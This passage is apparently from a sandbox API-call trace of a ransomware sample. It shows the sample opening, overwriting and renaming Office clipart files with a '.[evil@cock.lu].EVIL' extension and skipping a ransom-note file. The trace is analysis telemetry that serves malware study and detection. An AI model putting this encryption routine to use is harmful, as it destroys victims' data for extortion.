dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.174] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x721c, lpOverlapped=0x0) returned 1 [0120.177] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.177] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.177] _errno () returned 0x84b1160840 [0120.177] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.177] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7220, lpOverlapped=0x0) returned 1 [0120.177] CloseHandle (hObject=0x1a8) returned 1 [0120.177] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.177] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.177] __uncaught_exception () returned 0x84b1160800 [0120.177] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.178] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf.[evil@cock.lu].evil")) returned 1 [0120.178] ??_V@YAXPEAX@Z () returned 0x1 [0120.181] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF", dwFileAttributes=0x200) returned 0 [0120.181] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.181] wcsstr (_Str="FD00090_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.182] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 69 [0120.182] wcscmp (_String1="FD00090_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.182] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00090_.WMF") returned 0x0 [0120.182] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 0x45 [0120.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.184] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3772, lpOverlapped=0x0) returned 1 [0120.186] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.186] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.186] _errno () returned 0x84b1160840 [0120.187] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.187] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3780, lpOverlapped=0x0) returned 1 [0120.187] CloseHandle (hObject=0x1a8) returned 1 [0120.187] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.187] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.187] __uncaught_exception () returned 0x84b1160800 [0120.187] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.187] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf.[evil@cock.lu].evil")) returned 1 [0120.188] ??_V@YAXPEAX@Z () returned 0x1 [0120.191] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF", dwFileAttributes=0x200) returned 0 [0120.192] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.192] wcsstr (_Str="FD00096_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.192] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 69 [0120.192] wcscmp (_String1="FD00096_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00096_.WMF") returned 0x0 [0120.192] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 0x45 [0120.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.194] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x920e, lpOverlapped=0x0) returned 1 [0120.197] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.197] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.197] _errno () returned 0x84b1160840 [0120.197] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.197] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x9220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9220, lpOverlapped=0x0) returned 1 [0120.197] CloseHandle (hObject=0x1a8) returned 1 [0120.197] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.197] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.197] __uncaught_exception () returned 0x84b1160800 [0120.198] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.198] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf.[evil@cock.lu].evil")) returned 1 [0120.198] ??_V@YAXPEAX@Z () returned 0x1 [0120.202] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF", dwFileAttributes=0x200) returned 0 [0120.202] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.202] wcsstr (_Str="FD00296_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.202] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 69 [0120.202] wcscmp (_String1="FD00296_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.202] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00296_.WMF") returned 0x0 [0120.202] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 0x45 [0120.202] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.204] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3df0, lpOverlapped=0x0) returned 1 [0120.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.229] _errno () returned 0x84b1160840 [0120.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e00, lpOverlapped=0x0) returned 1 [0120.229] CloseHandle (hObject=0x1a8) returned 1 [0120.230] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.230] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.230] __uncaught_exception () returned 0x84b1160800 [0120.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf.[evil@cock.lu].evil")) returned 1 [0120.231] ??_V@YAXPEAX@Z () returned 0x1 [0120.234] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF", dwFileAttributes=0x200) returned 0 [0120.234] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.234] wcsstr (_Str="FD00297_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.235] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 69 [0120.235] wcscmp (_String1="FD00297_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.235] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00297_.WMF") returned 0x0 [0120.235] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 0x45 [0120.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.239] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4712, lpOverlapped=0x0) returned 1 [0120.261] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.261] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.261] _errno () returned 0x84b1160840 [0120.261] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.261] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4720, lpOverlapped=0x0) returned 1 [0120.261] CloseHandle (hObject=0x1a8) returned 1 [0120.261] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.261] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.261] __uncaught_exception () returned 0x84b1160800 [0120.261] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.262] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf.[evil@cock.lu].evil")) returned 1 [0120.262] ??_V@YAXPEAX@Z () returned 0x1 [0120.265] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF", dwFileAttributes=0x200) returned 0 [0120.265] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.266] wcsstr (_Str="FD00306_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 69 [0120.266] wcscmp (_String1="FD00306_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00306_.WMF") returned 0x0 [0120.266] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 0x45 [0120.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb6de, lpOverlapped=0x0) returned 1 [0120.293] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.293] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.293] _errno () returned 0x84b1160840 [0120.293] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.293] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xb6e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb6e0, lpOverlapped=0x0) returned 1 [0120.293] CloseHandle (hObject=0x1a8) returned 1 [0120.294] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.294] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.294] __uncaught_exception () returned 0x84b1160800 [0120.294] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.300] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf.[evil@cock.lu].evil")) returned 1 [0120.301] ??_V@YAXPEAX@Z () returned 0x1 [0120.303] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF", dwFileAttributes=0x200) returned 0 [0120.304] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.304] wcsstr (_Str="FD00336_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.304] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 69 [0120.304] wcscmp (_String1="FD00336_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.304] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00336_.WMF") returned 0x0 [0120.304] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 0x45 [0120.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.307] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17b4, lpOverlapped=0x0) returned 1 [0120.310] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.310] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.310] _errno () returned 0x84b1160840 [0120.310] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.310] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17c0, lpOverlapped=0x0) returned 1 [0120.310] CloseHandle (hObject=0x1a8) returned 1 [0120.310] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.311] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.311] __uncaught_exception () returned 0x84b1160800 [0120.311] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.311] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf.[evil@cock.lu].evil")) returned 1 [0120.312] ??_V@YAXPEAX@Z () returned 0x1 [0120.314] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF", dwFileAttributes=0x200) returned 0 [0120.314] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.314] wcsstr (_Str="FD00361_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.314] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 69 [0120.314] wcscmp (_String1="FD00361_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.314] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00361_.WMF") returned 0x0 [0120.314] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 0x45 [0120.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.750] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfea, lpOverlapped=0x0) returned 1 [0120.809] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.809] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.809] _errno () returned 0x84b1160840 [0120.809] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.809] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0120.809] CloseHandle (hObject=0x1a8) returned 1 [0120.809] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.809] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.809] __uncaught_exception () returned 0x84b1160800 [0120.809] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.810] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf.[evil@cock.lu].evil")) returned 1 [0120.810] ??_V@YAXPEAX@Z () returned 0x1 [0120.813] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF", dwFileAttributes=0x200) returned 0 [0120.813] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.813] wcsstr (_Str="FD00369_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.813] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 69 [0120.813] wcscmp (_String1="FD00369_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.813] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00369_.WMF") returned 0x0 [0120.813] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 0x45 [0120.813] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.815] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2168, lpOverlapped=0x0) returned 1 [0120.825] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.825] 